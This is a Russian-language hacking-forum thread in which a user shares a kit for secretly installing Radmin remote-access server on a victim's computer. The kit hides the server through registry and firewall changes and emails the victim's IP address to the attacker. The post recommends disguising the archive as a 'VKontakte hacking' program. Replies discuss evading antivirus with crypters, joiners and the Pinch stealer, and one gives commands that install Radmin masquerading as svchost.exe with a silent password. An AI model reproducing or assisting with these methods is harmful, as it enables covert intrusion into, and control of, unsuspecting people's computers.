Скрытый радмин + скрытая установка + ip на почту

Обсуждение в разделе «Безопасность и Анонимность», начал(-а) qazer, 20.12.2008.

  1. qazer

    qazer Member

    Регистрация:
    26.11.2008
    Сообщения:
    117
    Одобрения:
    45
    Репутация:
    -2
    Сборка от меня для тех кому лень перечитывать сотни страниц фака по этой теме.

    Все файлы надо добавить в SFX архив и в свойствах указать выполнить после распаковки install.bat

    далее при запуски архива...вы не увидите ничего)Это работа утилиты CMDow которая запускает cmd в скрытом режиме.

    что же происходит в данный момент?

    архив распаковывает файлы файлы для радмина копирует в windows, файлы почтовой утилиты в windows\system32\ , добавляет записи в реестре чтобы радминсервер не было видно,чтоб не ругался виндфаерволл, запускает радминсервер , и отдаёт команду на отсылку ip на ваш почтовый адрес.

    после того,как программа выполнится,все распакованные файлы удаляются.

    Как пользоваться?

    В файле install.bat надо прописать адрес логин и пароль вашей почты,а так же строку с паролем от радмина (по умолчанию пароля нет).далее создаём самораспаковывающийся архив, и кидаем его жертве.

    Чтобы не было так паливно,можно прописать в install.bat удаление самого архива и запуск какой-нибудь проги,установщик которой вы добавите в архив,например "Взлом_Вконтакте.exe"

    Дописывайте,корректируйте под свои нужды,я лишь выкладываю основу,далее всё зависит от вашей фантазии

    P.S. готовый sfx архив не возможно передать по почте,говорит найден вирус)как это обойти,каждый додумывается сам.


    http://www.filehoster.ru/files/bx3443

    никаких вирусов там нет,архив обычный
     
    Это одобряют 2 пользоветелей.
  2. k0lbasa

    k0lbasa Elder - Старейшина

    Регистрация:
    25.05.2008
    Сообщения:
    285
    Одобрения:
    132
    Репутация:
    -9
    отличная штука
     
    Это одобряет 1 пользователь.
  3. cremator (c)

    cremator (c) Elder - Старейшина

    Регистрация:
    20.06.2008
    Сообщения:
    284
    Одобрения:
    72
    Репутация:
    0
    Кто тестил?
     
  4. ex3me

    ex3me Member

    Регистрация:
    7.01.2009
    Сообщения:
    152
    Одобрения:
    63
    Репутация:
    0
    использование батников палится антивирусниками... имхо - этот способ устарел с тех пор, как ушла из жизни винда 95/98, поэтому см пост http://forum.antichat.ru/showpost.php?p=1041809&postcount=227
     
    Это одобряют 2 пользоветелей.
  5. SmaTR

    SmaTR New Member

    Регистрация:
    7.01.2009
    Сообщения:
    6
    Одобрения:
    0
    Репутация:
    0
    незнаю,всё проверил,каспер непалит,только вот ип на почту неприходит)) а тк у нас тут у всех ип динамический,приходится каждый раз просить прислать картинку в аське))))) есть какойнить способ узнать ип удаленно?
     
  6. stopxaker

    stopxaker Elder - Старейшина

    Регистрация:
    6.09.2008
    Сообщения:
    360
    Одобрения:
    276
    Репутация:
    18
    есть способ , я делаю так : радмин (моя сборка) +pinch, этот радмин перебивает уже установленный радмин на мой пароль и не виден в трее , что очень удобно .

    2 qazer способ устарел , протестил на 6 компах везде палево , опять же говорю радмин (моя сборка) +pinch+криптор+джойнер и будет всё very good ;)

    2 qazer а то что писал +
     
  7. ex3me

    ex3me Member

    Регистрация:
    7.01.2009
    Сообщения:
    152
    Одобрения:
    63
    Репутация:
    0
    У меня сейчас заказ: создать сборку, в которой отправка IP жертвы будет производиться на номер ICQ. Выложу позже на Плати.ру - кто захочет, тот приобритет.
    Спросите почему платно? Отвечу: после изменений в протоколе icq (ведь все обновляли квип до 8080? кто обновлял - поймет меня) довольно трудно написать что-то работающее, чтобы оно отправляло что-то куда-то (я использую делфи 7й версии)
     
  8. B1t.exe

    B1t.exe Elder - Старейшина

    Регистрация:
    6.11.2006
    Сообщения:
    1 130
    Одобрения:
    129
    Репутация:
    23
    так не понял, как отправляет на почту IP ? SMTP (25 Порт?)? а если стоит файрвол и у клиента нет аутлук ? (например у меня не стоит никакого почтового клиента).
     
  9. qazer

    qazer Member

    Регистрация:
    26.11.2008
    Сообщения:
    117
    Одобрения:
    45
    Репутация:
    -2
    там в сборке консольный почтовый клиент есть,который всё и отправляет юкстати там в настройках указан альтернативный порт (можно переделать на 25ый)
     
  10. stopxaker

    stopxaker Elder - Старейшина

    Регистрация:
    6.09.2008
    Сообщения:
    360
    Одобрения:
    276
    Репутация:
    18

    Я приобрету без разговора , давно уже юзаю твои сборки , доволен :)

    оффтоп 2 ex3me стукнул в аську ;)
     
  11. DREASTY

    DREASTY Elder - Старейшина

    Регистрация:
    19.11.2007
    Сообщения:
    38
    Одобрения:
    21
    Репутация:
    1
    молодчага!!давно таким занималсь!все еще актуально!
     
  12. stratocaster

    stratocaster New Member

    Регистрация:
    6.08.2008
    Сообщения:
    2
    Одобрения:
    0
    Репутация:
    -1
    Кто нить тестил? А то я нуб и оажется что это вдруг еще не работает, а если это работает - буду рабираться, отзовитесь кто тестил
     
  13. Tigger

    Tigger Elder - Старейшина

    Регистрация:
    27.08.2007
    Сообщения:
    1 080
    Одобрения:
    527
    Репутация:
    204
    Вы, конечно, прости, но я не нашел, где в настройках Архива определлый файл выполнить =\
     
  14. qazer

    qazer Member

    Регистрация:
    26.11.2008
    Сообщения:
    117
    Одобрения:
    45
    Репутация:
    -2
    делаешь sfx архив там на вкладке дополнительно есть строчка после распаковки выполнить и пишешь туда имя файла
     
  15. Shadow6120

    Shadow6120 Member

    Регистрация:
    26.12.2008
    Сообщения:
    16
    Одобрения:
    5
    Репутация:
    0
    А ни у кого нет подобной сборки только где радмин 3.*? А то висту срочно ломануть надо :)
     
  16. cracker

    cracker New Member

    Регистрация:
    6.04.2006
    Сообщения:
    12
    Одобрения:
    2
    Репутация:
    1
    в какой именно строки надо прописать пароли от радмина?и как?
     
  17. Kharek

    Kharek New Member

    Регистрация:
    1.02.2009
    Сообщения:
    12
    Одобрения:
    0
    Репутация:
    0
    Я добавил пароль к радмину такой командой:
    Code:
    "%SYSTEMROOT%/svchost.exe" /save /silence /pass:тут_пишешь_пароль /port:тут_пишешь_порт
    Пишешь эту команду сразу после строчки
    Code:
    "%SYSTEMROOT%/help/Tours/mmTour/svchost.exe" /install /silence
    Но почта не работает. Может быть это связано с тем, что я юзаю gmail.com, а у них защищенное TSL соеденение?
     
  18. pirbul

    pirbul New Member

    Регистрация:
    9.03.2008
    Сообщения:
    4
    Одобрения:
    1
    Репутация:
    0
    жалко что она одноразовая.....
     
  19. Scripter

    Scripter Member

    Регистрация:
    3.09.2008
    Сообщения:
    157
    Одобрения:
    95
    Репутация:
    6
    либо в реестре
     
  20. Hackser68

    Hackser68 Banned

    Регистрация:
    3.02.2009
    Сообщения:
    21
    Одобрения:
    29
    Репутация:
    0
    люди чёто я не вьехал обьясните дурачку как настроить?
     
    Это одобряют 7 пользоветелей.
Загрузка...